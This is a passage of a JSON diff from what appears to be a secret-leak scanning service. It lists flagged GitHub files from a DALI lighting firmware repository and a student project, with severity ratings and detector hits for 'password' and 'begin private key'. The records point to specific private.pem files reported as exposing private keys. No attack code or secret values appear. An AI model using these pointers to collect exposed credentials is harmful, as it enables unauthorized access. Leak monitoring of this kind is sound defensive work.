"authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5dee459468203f7f64a3f51530f815efefa32ce2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f8ea3160bba241d069f2b75b9cadf771c470422e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a6884161524d8816a8c0e63b1fa2801002670067", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f132712729ac8da9e0856099142918addee0403a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c374b2a1dadea76a3c8ab1943e3e51bd399ff07d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "da1448fad155214bd78242f813bffc16619fbf0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a82b2a96e8b268d47f1d9c168e7da1a1c0fc266e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c9114f8944effde90b37025b139322b764240b1a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c3dff850813cec01ee2231ffa6a8c5ab777f452a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f01461df25f20aeb39768972c83204386379c990", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6d44144be20f53cf85c849c1d3c13e9e2cda1038", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2b4ca2c4d910c2edb54d45b5d2587d5953a11bb0", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a562ff0bbe9883f032009c7b7848848761258e4f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "340ef96ad17c275de5e3868fdd3d67a2aadd87be", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "091ebb041384788d677b3e6d864d8f8bce2cf7b8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b00fd9faa47a0e87f4c9f6b79a7d5955a9d45074", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/DebugManager/DebugManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/DebugManager/DebugManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c2afd5748c47cf4242397e03d8d82c16db464028", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ManufInfo/ManufInfo_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ManufInfo/ManufInfo_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "e5dc3ab3034b5035c3892510c6e17292126414c5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5468e3536fa7b3f63c67c1f8ebe32cb062f35a0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8ab2b9622faff09a1621dafbb147ecf8ba501604", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "704ce46ed4918d3dfb434fb7411dd9c30741c1f6", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "bbbd5900be4a011205fe2ec46f297edffce2a698", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.c", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.c" + } + ], + "id": "e129487e8490976801d5ba2623078387b2cfacb3", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/example/DALILightEngine", + "numberOf": { + "contributors": 1, + "files": 93 + }, + "relations": { + "cyberintegration": "cyberintegration" + }, + "seqUpdate": 1728156880303511, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-03-31T20:52:25+03:00", + "dateDetected": "2024-10-12T14:58:23+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-03-31T22:27:43+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "41dba7b42f66eb72e3a2258cfeb068e7e9b6428c", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "e5ed9c96940166a0f1a0f2d8c538bb0587e02bd7", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686423433 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-06-04T11:32:06+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8921da431bbc562961a131ab5958c1324caa906d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "6e75ac76542184f03b48d6ce9208913529a8d1e1", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685867526 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e2cd18c6ec790fd72d13b68ed3880a8480845cc", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "1073384abb81cdbb0ea5a3be3ef1dba7bc4444b4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684792840 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-21T15:09:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7f03a2f14de1e70769b1f86e15cd7425514ccb66", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f82dec2051836821828ae7b84b99aa84aa4885c4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684670995 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7d51b93711e35b3ac97f4d483f87d4c8bbedb292", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "33cbe7fb2d127e8efd7dd98d808db8c223d89ec8", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684863717 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-24T18:03:58+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "c1b015cb6cdff6b28071e77e09e43bd87dbecd4f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "56101d6fa71af13ea5eef67f7cf0b088d6334e9d", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685026090 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "3352e1c8441c1eb0d2a6b9968575d4aab71e566e", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f4e19cdb63d2aa490e1c754d5d7bf4a640fa7599", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684940638 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-06-10T21:39:20+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 